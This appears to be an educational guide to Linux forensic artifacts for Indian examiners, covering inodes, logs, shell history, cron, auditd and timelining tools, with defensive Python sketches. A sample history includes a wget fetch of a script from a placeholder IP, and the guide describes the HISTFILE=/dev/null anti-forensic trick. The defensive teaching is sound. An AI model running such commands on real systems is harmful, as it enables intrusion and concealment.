Linux Forensic Artifacts: File System, Logs, Cron and Shell History
ext4, /var/log, auditd, journalctl, bash history, cron persistence, SUID, SELinux and plaso timelining for Indian digital forensic examiners working Linux servers.
The interesting Indian digital forensic cases stop being Windows the moment they touch a server. Web hosting providers, payment gateways, government departments, and most of the cloud workloads CERT-In sees in its incident pipeline are Linux. A forensic examiner who can read an ext4 inode, parse auth.log, pull a deleted bash history from journal binary logs, and spot a cron entry that adds a user every Tuesday at 03:00 IST is the examiner the case actually needs. The Windows artifact playbook does not translate. Linux puts its trail in plain-text files (mostly), in binary journal databases (increasingly), and in places like /proc and /sys that exist only while the system is running.
This topic walks the file-system-to-userspace stack a Linux forensic examiner reads, in the order they typically read it. The framing throughout is Indian, with CERT-In's mandatory log retention regime under the 28 April 2022 directions, the IT Act 2000 read with BSA 2023 Section 63 for admissibility, and the working assumption that the target system is a Debian, Ubuntu, RHEL or CentOS server. macOS sits next to Linux on the BSD branch of the family tree; the macOS plist, Keychain and Time Machine topic is the natural follow-up. For the persistence-and-removal half of the same stack, see data recovery and file carving.
If you can read an inode, you can read the rest of the system.
Linux servers in Indian production are overwhelmingly ext4, with XFS dominant on RHEL-family RAID arrays, Btrfs visible on SUSE and on some Synology NAS evidence, and ZFS on FreeNAS-derived storage appliances. Each file system answers the same examiner questions differently: where do MAC times live, how is the journal organised, what happens at deletion, and what survives.
ext4 keeps file metadata in inodes. An inode carries the permissions (mode bits), the owning UID and GID, the file size, the link count, four timestamps (atime, mtime, ctime and crtime since ext4), and an extent tree that locates the file's data blocks on disk. The file name does not live in the inode. It lives in the parent directory entry, which is an array of (inode_number, name) pairs. The practical consequence: when a file is deleted on ext4, the directory entry's inode number is typically zeroed (or the entry is marked unused), but the inode itself often survives with its block pointers cleared. The data blocks themselves are unmodified until reallocated.
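The split between inode and directory entry can be observed on any live Linux system. The following is a minimal sketch, assuming a file system that supports hard links; `describe_inode` and `demo` are illustrative names, not part of any forensic tool. It creates one file with two names and shows that both names resolve to the same inode. Note that Python's `os.lstat` on Linux does not expose crtime; reading it needs `statx` or an offline tool such as `istat`.

```python
import os
import stat
import tempfile


def describe_inode(path):
    """Return the inode-level metadata that lstat() exposes for a path."""
    st = os.lstat(path)  # lstat: describe the link itself, never its target
    return {
        "inode": st.st_ino,
        "mode": stat.filemode(st.st_mode),
        "uid": st.st_uid,
        "gid": st.st_gid,
        "size": st.st_size,
        "links": st.st_nlink,
        "atime": st.st_atime,
        "mtime": st.st_mtime,
        "ctime": st.st_ctime,
    }


def demo():
    """Create one file with two directory entries and describe both names."""
    with tempfile.TemporaryDirectory() as d:
        first = os.path.join(d, "report.txt")
        second = os.path.join(d, "alias.txt")
        with open(first, "w") as fh:
            fh.write("evidence")
        os.link(first, second)  # second directory entry, same inode
        return describe_inode(first), describe_inode(second)


if __name__ == "__main__":
    for info in demo():
        print(info)
```

Both dictionaries carry the same inode number and a link count of 2, because the names live in the directory while everything else lives in the inode.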
The ext4 journal (the jbd2 log) records metadata changes in /dev/sdX1's reserved journal area. The journal is a circular buffer; for a busy server it cycles in minutes. For a quiet workstation, hours of journal history can survive. Tools like extundelete and ext4magic parse the journal to recover recently deleted files even after the inode is cleared, because the journal carries the pre-deletion inode state.
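| File system | Inode timestamps | Journal | Deletion behaviour |
|---|---|---|---|
| ext2 | atime, mtime, ctime (second precision) | None | Inode block pointers preserved until reallocated; deleted files highly recoverable. |
| ext3 | atime, mtime, ctime (second precision) | Optional metadata journal (jbd) | Inode block pointers preserved; journal helps recover recent deletes. |
| ext4 | atime, mtime, ctime, crtime (nanosecond) | jbd2 metadata journal, optional data journal | Inode block pointers zeroed on delete; extundelete and ext4magic parse journal. |
| XFS | atime, mtime, ctime (no birth time field by default) | Internal log section | Aggressive delayed allocation; deletion recovery harder, xfs_undelete project. |
| Btrfs | atime, mtime, ctime, otime | Copy-on-write, no traditional journal | Snapshots are the primary recovery surface; btrfs-find-root for catastrophic loss. |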
The bits that separate a normal binary from a backdoor.
POSIX permissions on Linux are three triplets: owner, group, others, each with read, write and execute. The numeric form (chmod 755) and the symbolic form (rwxr-xr-x) are the same thing. The examiner cares about three extra bits beyond the basics.
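- SUID (setuid, octal 4000): an executable runs with the effective UID of the file's owner rather than the caller's.
- SGID (setgid, octal 2000): an executable runs with the file's group; on a directory, new files inherit the directory's group.
- Sticky bit (octal 1000): on a directory, only a file's owner (or root) can delete or rename it. /tmp is the canonical example.

A baseline Linux system has a known set of SUID binaries (/bin/su, /usr/bin/sudo, /usr/bin/passwd, /usr/bin/chsh, a handful more). Any SUID binary outside that baseline, especially one owned by root with mode 4755, is a finding. The textbook detection is find / -perm -4000 -type f 2>/dev/null for SUID, with -perm -2000 in place of -perm -4000 for SGID. The 2024 incident response at an Indian PSU's procurement portal turned on a single line in the find output: /usr/local/lib/libcrypt-cache.so.1, set SUID root and masquerading as a libc helper, was the dropper's persistence mechanism.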
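The baseline comparison can also be run against a mounted evidence image instead of the live root. The following is a rough sketch under stated assumptions: the `BASELINE` set is illustrative only (a real one comes from a known-clean install of the same release), and `find_setid`, `demo` and the planted file name are hypothetical.

```python
import os
import stat
import tempfile

# Illustrative baseline only; build the real one from a known-clean install
# of the same distribution and release.
BASELINE = frozenset({"/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/sudo", "/bin/su"})


def find_setid(root, baseline=BASELINE):
    """Return [(path_inside_root, 'SUID' or 'SGID', owner_uid)] for regular
    files that carry a set-id bit and are not listed in the baseline."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            inside = "/" + os.path.relpath(full, root)
            if inside in baseline:
                continue
            if st.st_mode & stat.S_ISUID:
                hits.append((inside, "SUID", st.st_uid))
            if st.st_mode & stat.S_ISGID:
                hits.append((inside, "SGID", st.st_uid))
    return sorted(hits)


def demo():
    """Build a throwaway tree with one planted SUID file and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr/local/lib"))
        planted = os.path.join(root, "usr/local/lib/helper.so.1")  # hypothetical
        plain = os.path.join(root, "usr/local/lib/plain.so.1")     # hypothetical
        for path in (planted, plain):
            open(path, "w").close()
        os.chmod(planted, 0o4755)
        os.chmod(plain, 0o755)
        return find_setid(root)


if __name__ == "__main__":
    print(demo())
```

Reporting the path relative to the scan root keeps the output comparable with a baseline taken from a live system, whatever directory the image is mounted on.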
ACLs extend POSIX with per-user and per-group entries beyond the owner-group-others triplet. getfacl /path/to/file reads them; setfacl writes them. ACLs are not visible in a normal ls -l (the trailing + is the only hint), so a file with an unexpected ACL is easy to miss in a hurried audit.
SELinux and AppArmor are the Mandatory Access Control frameworks. SELinux is RHEL/CentOS default and labels every file with a user:role:type:level context (ls -Z to view). AppArmor is Debian/Ubuntu default and uses per-binary profiles in /etc/apparmor.d/. A forensic finding: a process running with an unexpected SELinux context, or an AppArmor profile that has been silently disabled (aa-status), is a tampering indicator.
Hidden files on Linux are just files whose names start with a dot. ls skips them; ls -la shows them. The convention is older than the file system itself. Attackers exploit it heavily, especially in user home directories (~/.cache/.config-backup/) and in /tmp/. / (note the trailing space) and /var/tmp/.../ style names that survive routine cleanups.
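Names built only from dots and spaces, or padded with whitespace, are easy to overlook in a terminal listing. The following is a small sketch of one way to surface them on a mounted image; the heuristic and the names `suspicious_names` and `demo` are assumptions for illustration, not an established detection rule.

```python
import os
import tempfile


def suspicious_names(root):
    """Return paths (relative to root) whose final component is made only of
    dots and spaces, or carries leading or trailing whitespace."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            dots_and_spaces = name.startswith(".") and set(name) <= {".", " "}
            padded = name != name.strip()
            if dots_and_spaces or padded:
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


def demo():
    """Build a throwaway tree with two evasive directory names and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "home/u/.config"))  # ordinary dot directory
        os.makedirs(os.path.join(root, "tmp", ". "))       # dot plus trailing space
        os.makedirs(os.path.join(root, "var/tmp", "..."))  # triple dot
        open(os.path.join(root, "home/u/notes.txt"), "w").close()
        return suspicious_names(root)


if __name__ == "__main__":
    for path in demo():
        print(repr(path))  # repr() makes trailing spaces visible
```

Printing with `repr()` matters here: a plain print would render the trailing space invisibly, which is exactly the property the attacker relies on.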
What auth.log, syslog, wtmp and journald between them know.
The Indian server-side forensic workflow lives in /var/log/. Different distributions split it differently, but the artifact families are stable.
- /var/log/auth.log on Debian and Ubuntu, /var/log/secure on RHEL and CentOS. Authentication events: ssh logins (successful and failed), sudo invocations, su, pam events. This is the first file the examiner reads.
- /var/log/syslog on Debian/Ubuntu, /var/log/messages on RHEL/CentOS. General system events that the kernel and daemons emit. Drivers loading, mounts happening, services starting and stopping.
- /var/log/wtmp: binary database of successful login and logout events. Read with last. Records the username, terminal, source IP (for remote logins), and the duration of the session.
- /var/log/btmp: binary database of failed login attempts. Read with lastb. The Indian web hosting reality is that lastb on any internet-facing server shows tens of thousands of ssh brute-force attempts; the signal is in the source IP geography and timing patterns.
- /var/log/lastlog: binary database of the single most recent login per user. Read with lastlog. Useful for "when did root last log in directly" questions.
- /var/log/kern.log or kernel events inside /var/log/messages: OOM kills, hardware errors, USB plug events.
- /var/log/audit/audit.log if auditd is running: rule-driven kernel-level audit records.
- /var/log/journal/<machine-id>/system.journal: the systemd-journald binary database, on modern distributions the canonical location for everything except the legacy text files above.

Two artifacts attackers tamper with first.
Shell history is the file the attacker tries to wipe. ~/.bash_history is the default for bash; ~/.zsh_history for zsh. The environment variables that govern them are worth memorising:
- HISTSIZE: maximum number of commands kept in memory for the current session.
- HISTFILESIZE: maximum number of commands kept in the history file on disk.
- HISTFILE: the file path. Setting it to /dev/null is the classic anti-forensic trick.
- HISTTIMEFORMAT: when set, prefixes each history entry with a timestamp. When unset, history entries are bare commands with no time information.

The forensic reality on Indian production servers is that HISTTIMEFORMAT is usually unset, which means the bash history is a flat list of commands with no times attached. Examiners deal with this in three ways. First, cross-reference against /var/log/auth.log to bracket the user's session windows: a command in the history at position 47 is between the login at 14:02 and the logout at 14:55. Second, look for .bash_history.<timestamp> rotated files left behind by misconfigured rotation. Third, parse the systemd journal for _COMM=bash and _COMM=sudo entries, which carry timestamps even when bash history does not; sudo logs each invocation there by default, while bash entries appear only where shell command logging has been configured.
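When HISTTIMEFORMAT was set during the session, bash stores each timestamp in the history file as a comment line of the form `#<epoch seconds>` ahead of the command it belongs to. The following is a minimal parsing sketch; `parse_bash_history` is an illustrative name, and the sample content (including the documentation-range IP address) is invented for the demonstration.

```python
from datetime import datetime, timezone


def parse_bash_history(text):
    """Return [(utc_datetime_or_None, command)] from .bash_history content.

    A line of '#' followed only by digits is treated as the timestamp of the
    next command. A command that is literally '#12345' would be misread, so
    treat the result as a lead, not as proof.
    """
    entries = []
    pending = None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            pending = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            continue
        if line.strip():
            entries.append((pending, line))
            pending = None
    return entries


# Invented sample: one timestamped command, one bare command.
SAMPLE = "#1715331720\nwget http://203.0.113.9/x.sh\nchmod +x x.sh\n"

if __name__ == "__main__":
    for when, command in parse_bash_history(SAMPLE):
        stamp = when.isoformat() if when else "(no timestamp)"
        print(stamp, command)
```

Commands that come back with `None` are the ones that still need bracketing against session windows from the authentication log.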
Cron is the persistence vector. Linux cron has more places to hide than examiners typically check.
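A sweep of the usual cron locations on a mounted image can be sketched as follows. The path list covers the commonly used locations on Debian/Ubuntu and RHEL/CentOS and is not exhaustive (systemd timers and at jobs are out of scope here); `CRON_PATHS`, `list_cron_files`, `active_lines`, `demo` and the sample job are illustrative assumptions.

```python
import os
import tempfile

# Common cron locations, relative to the image root. Not exhaustive.
CRON_PATHS = [
    "etc/crontab",
    "etc/anacrontab",
    "etc/cron.d",
    "etc/cron.hourly",
    "etc/cron.daily",
    "etc/cron.weekly",
    "etc/cron.monthly",
    "var/spool/cron",  # per-user crontabs; Debian keeps them in crontabs/ below this
]


def list_cron_files(image_root):
    """Return every file found under the known cron locations."""
    found = []
    for rel in CRON_PATHS:
        top = os.path.join(image_root, rel)
        if os.path.isfile(top):
            found.append(top)
        elif os.path.isdir(top):
            for dirpath, _dirs, files in os.walk(top):
                found.extend(os.path.join(dirpath, name) for name in files)
    return sorted(found)


def active_lines(path):
    """Return the non-blank, non-comment lines of a cron file."""
    with open(path, errors="replace") as fh:
        return [ln.rstrip("\n") for ln in fh
                if ln.strip() and not ln.lstrip().startswith("#")]


def demo():
    """Build a throwaway root with a system crontab and one per-user crontab."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "var/spool/cron/crontabs"))
        with open(os.path.join(root, "etc/crontab"), "w") as fh:
            fh.write("# system crontab, no jobs\n")
        with open(os.path.join(root, "var/spool/cron/crontabs/www-data"), "w") as fh:
            fh.write("# hypothetical job\n0 */6 * * * /var/tmp/.x/run.sh\n")
        return {os.path.relpath(p, root): active_lines(p)
                for p in list_cron_files(root)}


if __name__ == "__main__":
    for path, jobs in demo().items():
        print(path, jobs)
```

Walking `var/spool/cron` recursively picks up both the RHEL layout (files directly in the directory) and the Debian layout (files under `crontabs/`).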
The kernel-side audit and the userspace-side hiding tricks.
auditd is the Linux Audit Daemon. It runs as a userspace process that hooks into the kernel audit subsystem and writes records to /var/log/audit/audit.log. Rules live in /etc/audit/audit.rules, which most current distributions generate from the fragments under /etc/audit/rules.d/ using augenrules. A baseline production rule set typically watches /etc/passwd, /etc/shadow, /etc/sudoers, the cron drop directories, and execve syscalls by privileged users.
-w /etc/passwd -p wa -k identity
-w /etc/shadow -p wa -k identity
-w /etc/sudoers -p wa -k privilege
-a always,exit -F arch=b64 -S execve -F euid=0 -k root-exec
ausearch -k identity --start 05/10/2026 00:00:00 queries records matching the identity rule key; the date and the time are passed as separate arguments, and the date format follows the locale of the analysis host (the form shown is en_US). aureport --summary produces a high-level summary across the log. The Indian CERT-In log retention directions of 28 April 2022 effectively require Indian VPS and data-centre operators to keep audit and authentication logs for 180 days; this is the regulation that turned auditd from a nice-to-have into a deployed-everywhere baseline on Indian-hosted Linux servers.
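When ausearch is not available on the analysis host, raw audit.log lines can be read directly. Each record starts with `type=... msg=audit(<epoch>.<millis>:<serial>):` followed by key=value fields. The following is a minimal sketch that assumes the default raw log format (not the enriched format); `parse_audit_line` is an illustrative name and the sample record is invented.

```python
import re
import shlex
from datetime import datetime, timezone

HEADER = re.compile(
    r"^type=(?P<type>\S+) msg=audit\((?P<sec>\d+)\.(?P<ms>\d+):(?P<serial>\d+)\):\s*(?P<body>.*)$"
)


def parse_audit_line(line):
    """Return a dict for one raw audit.log line, or None if it does not match."""
    match = HEADER.match(line.strip())
    if not match:
        return None
    try:
        tokens = shlex.split(match.group("body"))  # honours quoted values
    except ValueError:
        tokens = match.group("body").split()       # unbalanced quotes: best effort
    fields = {}
    for token in tokens:
        if "=" in token:
            key, value = token.split("=", 1)
            fields[key] = value
    return {
        "type": match.group("type"),
        "time": datetime.fromtimestamp(int(match.group("sec")), tz=timezone.utc),
        "serial": int(match.group("serial")),
        "fields": fields,
    }


# Invented sample record in the raw audit.log layout.
SAMPLE = ('type=SYSCALL msg=audit(1715331720.123:4567): arch=c000003e syscall=59 '
          'success=yes exit=0 uid=0 euid=0 comm="bash" exe="/usr/bin/bash" '
          'key="root-exec"')

if __name__ == "__main__":
    record = parse_audit_line(SAMPLE)
    print(record["time"].isoformat(), record["type"], record["fields"].get("key"))
```

Records that share a serial number belong to the same event, so grouping on `serial` is the natural next step when reassembling SYSCALL, EXECVE and PATH records.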
Temp directories are forensic-significant for two reasons. /tmp and /var/tmp are world-writable, and attackers use them as staging areas. The difference: /tmp is cleared on reboot on most distributions (via systemd-tmpfiles); /var/tmp persists across reboots. A payload dropped in /var/tmp survives a reboot and is easier to spot post-incident than one in /tmp that has been swept.
/etc/fstab lists every persistent mount. The mount command shows what is mounted now. A mismatch between the two is a finding: a device that is mounted but not in fstab was mounted by hand, possibly by an attacker; a device in fstab but not mounted may have been removed. readlink -f resolves symbolic links to their target; chains of symbolic links in user home directories or /usr/local/ are a hiding pattern.
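The fstab-versus-mounted comparison can be sketched on captured text, for example /etc/fstab from the image and a saved copy of /proc/mounts from live response. This is an illustration under assumptions: only block-device style entries are compared, entries marked noauto would need separate handling, and `parse_mount_table`, `compare_mounts` and the sample tables are hypothetical.

```python
def parse_mount_table(text):
    """Return [(spec, mount_point, fstype)] from fstab- or /proc/mounts-style text."""
    rows = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 3:
            rows.append((parts[0], parts[1], parts[2]))
    return rows


BLOCK_SPECS = ("/dev/", "UUID=", "LABEL=", "PARTUUID=")


def compare_mounts(fstab_text, mounts_text):
    """Compare mount points declared in fstab with those actually mounted."""
    expected = {mp for spec, mp, fstype in parse_mount_table(fstab_text)
                if fstype != "swap" and spec.startswith(BLOCK_SPECS)}
    live = {mp for spec, mp, _fstype in parse_mount_table(mounts_text)
            if spec.startswith("/dev/")}  # skips proc, sysfs, tmpfs and similar
    return {
        "mounted_not_in_fstab": sorted(live - expected),
        "in_fstab_not_mounted": sorted(expected - live),
    }


# Invented sample tables.
FSTAB = "UUID=abcd / ext4 defaults 0 1\n/dev/sdb1 /data xfs defaults 0 2\n"
MOUNTS = ("/dev/sda1 / ext4 rw 0 0\n"
          "proc /proc proc rw 0 0\n"
          "/dev/sdc1 /mnt/.x ext4 rw 0 0\n")

if __name__ == "__main__":
    print(compare_mounts(FSTAB, MOUNTS))
```

Comparing on mount point rather than device name sidesteps the fact that fstab often names devices by UUID while the live table shows /dev paths.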
Linux-specific malware artifacts cluster around two techniques. First, kernel-mode rootkits (loadable kernel modules under /lib/modules/<kernel>/) hide files, processes and network sockets by hooking syscalls. Detection: lsmod against a known-clean baseline, kmod list for module metadata, and offline disk-image scans because a running rootkit can lie to live tooling. Second, user-space hooking, where a shared library named in /etc/ld.so.preload or in the LD_PRELOAD environment variable is injected into every dynamically linked process; the library intercepts readdir, open, connect and friends. Detection: strace against a known-clean binary, comparison of ls against find (different syscall patterns; a hook that fools one may not fool the other), and tools like rkhunter and chkrootkit that look for the common signatures.
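User-space preload hooks leave two checkable traces: the contents of /etc/ld.so.preload and an LD_PRELOAD entry in a process's environment, which is visible in /proc/<pid>/environ as NUL-separated KEY=VALUE pairs. The following is a minimal sketch that works on captured content; the function names and sample data are illustrative, and the separator handling (whitespace or colons, with # comments in the file) reflects my understanding of glibc's behaviour rather than a guarantee.

```python
import re


def preload_from_environ(blob):
    """Return libraries named in LD_PRELOAD within a /proc/<pid>/environ blob."""
    prefix = b"LD_PRELOAD="
    for item in blob.split(b"\0"):
        if item.startswith(prefix):
            value = item[len(prefix):].decode(errors="replace")
            return [part for part in re.split(r"[\s:]+", value) if part]
    return []


def preload_from_file(text):
    """Return libraries listed in /etc/ld.so.preload content."""
    libraries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # drop comments
        libraries.extend(part for part in re.split(r"[\s:]+", line) if part)
    return libraries


# Invented samples; the library paths are hypothetical.
ENVIRON = b"PATH=/usr/bin\0LD_PRELOAD=/usr/local/lib/hook.so\0HOME=/root\0"
PRELOAD_FILE = "# note\n/lib/a.so /lib/b.so\n"

if __name__ == "__main__":
    print(preload_from_environ(ENVIRON))
    print(preload_from_file(PRELOAD_FILE))
```

On most servers both lists are empty, so any entry at all is worth hashing and comparing against the distribution's packages.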
The integrated workflow for an SFSL Linux case.
The artifact-by-artifact reading is for the textbook. The casework reading is integrated. Three tool families do the heavy lifting on an Indian SFSL Linux investigation.
Sleuth Kit and Autopsy. Sleuth Kit's command-line tools (mmls, fls, icat, istat, blkls, tsk_recover) parse the on-disk image without mounting it, which is the right move for evidence integrity. mmls image.dd lists partitions; fls -r -m / -o <offset> image.dd walks the file system and emits a bodyfile suitable for timelining, where <offset> is the partition's starting sector as reported by mmls; icat -o <offset> image.dd <inode> extracts a file by inode number. Autopsy is the GUI layer that wraps the same tooling and adds keyword search, hash lookup, and report generation. Indian academic labs at NFSU Gandhinagar and at LNJN NICFS Delhi teach Autopsy as the default GUI.
log2timeline / plaso. Plaso ingests every supported artifact format from a mounted image or a directory and writes a .plaso storage file. psort.py renders the storage file to CSV, Elasticsearch, or any other supported sink. The output is the super-timeline: one row per event, sortable by time, joinable against any other CSV. For a Linux server image, plaso pulls bash history, syslog, auth.log, wtmp, journald binaries, auditd records, cron drops, and file system MAC times into a single timeline. The CSM-side analogue is the chain of custody workflow that wraps the analytical result; the digital chain begins at imaging and ends at the BSA 2023 Section 63 certificate.
Mac-robber. A small but useful tool that walks a mounted file system and emits a bodyfile for mactime. Faster than fls when the image is already mounted read-only for triage. Often used as the first-pass timelining step.
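The bodyfile that fls -m and mac-robber emit is pipe-delimited text in the Sleuth Kit 3.x layout: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime, with times in epoch seconds. The following is a rough sketch of what mactime does with it, reduced to the essentials; `bodyfile_events` is an illustrative name and the sample line is invented.

```python
def bodyfile_events(text):
    """Return sorted (epoch, flag, name) tuples, one per non-zero timestamp.

    Flags follow the mactime convention: m, a, c, b (b = birth/crtime).
    """
    events = []
    for line in text.splitlines():
        if not line or line.startswith("#") or line.count("|") < 10:
            continue
        _md5, rest = line.split("|", 1)
        # Split from the right so a '|' inside the file name survives.
        parts = rest.rsplit("|", 9)
        name = parts[0]
        try:
            atime, mtime, ctime, crtime = (int(value) for value in parts[6:10])
        except ValueError:
            continue
        for flag, stamp in (("m", mtime), ("a", atime), ("c", ctime), ("b", crtime)):
            if stamp > 0:
                events.append((stamp, flag, name))
    return sorted(events)


# Invented sample line; the path is hypothetical.
SAMPLE = ("0|/var/tmp/.x/run.sh|131|-rwxr-xr-x|33|33|512|"
          "1715331720|1715331700|1715331700|1715331600\n")

if __name__ == "__main__":
    for stamp, flag, name in bodyfile_events(SAMPLE):
        print(stamp, flag, name)
```

Emitting one row per timestamp, rather than one row per file, is what lets file system activity interleave with log events in a single sorted timeline.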
The Indian context that frames all of this. Linux dominates the server side of the Indian internet: BSNL infrastructure, payment-gateway endpoints, NIC-hosted government portals, the bulk of cloud workloads in AWS Mumbai, Azure Pune and GCP Delhi regions. CERT-In's 28 April 2022 directions require data-centre and VPS providers to maintain ICT system logs for 180 days, with mandatory incident reporting within six hours of detection. The effect of this regulation on forensic practice is direct: the auth.log, journald and auditd records the examiner expects to find usually exist for the relevant time window, and the absence of them is itself a finding (and a CERT-In compliance breach by the operator). The case files coming out of the I4C (Indian Cybercrime Coordination Centre) pipeline routinely include auditd exports and journald .journal files as evidence annexures, certified under BSA 2023 Section 63.
/proc and /sys are not file systems in the on-disk sense. They are virtual interfaces to kernel state. /proc/<pid>/ exposes per-process state (cmdline, exe symlink, fd descriptors, maps, environ); /sys/class/ exposes device-driver state. Neither survives a reboot, but on a live system both are gold. The examiner who can read /proc/<pid>/maps for a suspicious PID gets a list of every memory-mapped library and file the process has open, which is often the fastest route to identifying an unfamiliar payload.
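Each line of /proc/<pid>/maps has the form `address perms offset dev inode pathname`, with the pathname absent for anonymous mappings. The following is a minimal sketch that parses a captured maps file and flags executable mappings that are either backed by a deleted file or loaded from a staging directory; the prefix list (including /dev/shm/) and the names `parse_maps` and `flag_mappings` are assumptions for illustration, and the sample is invented.

```python
def parse_maps(text):
    """Return one dict per mapping in /proc/<pid>/maps content."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        rows.append({
            "range": parts[0],
            "perms": parts[1],
            "inode": int(parts[4]),
            "path": parts[5].strip() if len(parts) == 6 else "",
        })
    return rows


def flag_mappings(rows, prefixes=("/tmp/", "/var/tmp/", "/dev/shm/")):
    """Return paths of executable mappings that are deleted or staged."""
    hits = []
    for row in rows:
        if "x" not in row["perms"]:
            continue
        deleted = row["path"].endswith(" (deleted)")
        staged = row["path"].startswith(prefixes)
        if deleted or staged:
            hits.append(row["path"])
    return hits


# Invented sample; paths are hypothetical.
SAMPLE = (
    "55d0c0a00000-55d0c0a21000 r-xp 00000000 08:01 1311 /usr/bin/bash\n"
    "7f2c1a000000-7f2c1a021000 r-xp 00000000 08:01 2622 /var/tmp/.x/libhook.so\n"
    "7f2c1b000000-7f2c1b001000 r-xp 00000000 00:05 99 /memfd:payload (deleted)\n"
    "7ffd4c000000-7ffd4c021000 rw-p 00000000 00:00 0 [stack]\n"
    "7f2c1c000000-7f2c1c001000 rw-p 00000000 00:00 0\n"
)

if __name__ == "__main__":
    for path in flag_mappings(parse_maps(SAMPLE)):
        print(path)
```

A mapping marked `(deleted)` means the process is still running code from a file that no longer has a directory entry, which is a common pattern when a payload removes itself after launch.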
systemd-journald is the framework that ate most of the rest. The journal database under /var/log/journal/<machine-id>/ is binary, indexed, and queryable with rich filters. journalctl --since "2026-05-10 00:00" --until "2026-05-12 23:59" slices by time. journalctl _SYSTEMD_UNIT=sshd.service filters by service. journalctl -k gives kernel ring buffer entries. journalctl _UID=1001 gives every entry attributed to a specific user. The forensic examiner extracts the binary journal directly from the image and runs journalctl --file /path/to/system.journal on the analysis host.
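For scripted analysis, journalctl can export entries as one JSON object per line with -o json, where __REALTIME_TIMESTAMP holds microseconds since the epoch as a string. The following is a minimal sketch that reads such an export and filters on _COMM; `read_journal_json` is an illustrative name and the sample entries are invented.

```python
import json
from datetime import datetime, timezone


def read_journal_json(lines, comm=None):
    """Yield (utc_datetime, comm, message) from `journalctl -o json` output."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        entry = json.loads(line)
        if comm is not None and entry.get("_COMM") != comm:
            continue
        usec = int(entry["__REALTIME_TIMESTAMP"])
        when = datetime.fromtimestamp(usec / 1_000_000, tz=timezone.utc)
        message = entry.get("MESSAGE")
        if isinstance(message, list):  # non-UTF-8 payloads arrive as byte arrays
            message = bytes(message).decode(errors="replace")
        yield when, entry.get("_COMM"), message


# Invented sample export lines.
SAMPLE = [
    '{"__REALTIME_TIMESTAMP":"1715331720000000","_COMM":"sudo",'
    '"MESSAGE":"deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/id"}',
    '{"__REALTIME_TIMESTAMP":"1715331725000000","_COMM":"sshd",'
    '"MESSAGE":"Disconnected from user deploy 203.0.113.9 port 50022"}',
]

if __name__ == "__main__":
    for when, comm, message in read_journal_json(SAMPLE, comm="sudo"):
        print(when.isoformat(), comm, message)
```

The export itself would come from something like journalctl --file /path/to/system.journal -o json run on the analysis host, so the evidence copy is only ever read.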
A real Indian incident in 2024 at a media-streaming startup turned on a cron entry in /var/spool/cron/crontabs/www-data that exfiltrated /etc/passwd and /etc/shadow to an attacker-controlled host every six hours. The system crontab had been audited and was clean; the per-user crontab for the www-data web user had been overlooked by the in-house team. CERT-In's post-incident note (CIAD-2024-0144) flagged the per-user crontab location as a recurring blind spot.